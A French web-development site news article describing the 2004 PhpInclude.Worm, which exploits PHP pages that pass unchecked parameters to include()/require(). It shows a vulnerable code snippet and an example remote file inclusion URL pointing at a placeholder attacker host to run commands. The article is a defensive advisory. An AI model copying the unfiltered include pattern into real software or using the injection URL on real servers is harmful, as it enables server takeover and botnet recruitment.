Menu

Accueil
Cours Internet
Le Forum
Outils webmaster
Annuaire
Actualités
MySpeach
Scripts PHP
Le site
Les Extras

Membres


Pas encore membre ?
inscrivez-vous ici

Connexion :
Login
Code
Mot de passe perdu ?
Liste des membres

Partenaires

Informatique facile Dreamweaver PHP Elevage de mastiff Creation de site

PhpInclude.Worm attaque les pages php insécurisées

PhpInclude.Worm attaque les pages php insécurisées

Sommaire > Sécuriter >

PhpInclude.Worm attaque les pages php insécurisées


Le nouveau ver PhpInclude.Worm se propage actuellement sur internet, il s'attaque à toute page dynamique non sécurisée.

[Ce ver est détecté par certains antivirus comme étant une variante de Santy. Nous estimons que ce ver est totalement différent de la famille Santy, nous avons donc décidé de lui attribuer l'alias générique "PhpInclude.Worm"].

Contrairement à Santy, PhpInclude.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "include()" et "require()" de façon non-sécurisée. Comment ?


Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :

-------- Exemple : vulnerable.php --------
if(isset($page))
{
include($page);
}

La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y insérer différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.

Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.

Pour lire la suite :
http://www.k-otik.com/news/20041226.PhpIncludeWorm.php
Source de http://www.k-otik.com/

Je vous conseil également de lire ce infos pour sécuriser vos pseudo frame php :
http://www.phpsecure.info/v2/article/php-security.php
http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php
http://www.graphiks.net/aide-forum/lecture-801-3-0.html

écrit par sky



Poster un commentaire sur cette article


Pseudo :
Texte :
Recopier ce code : ici

Nous  -  Plan du site  -  Informations légale  -  Contact  -  © Graphiks.net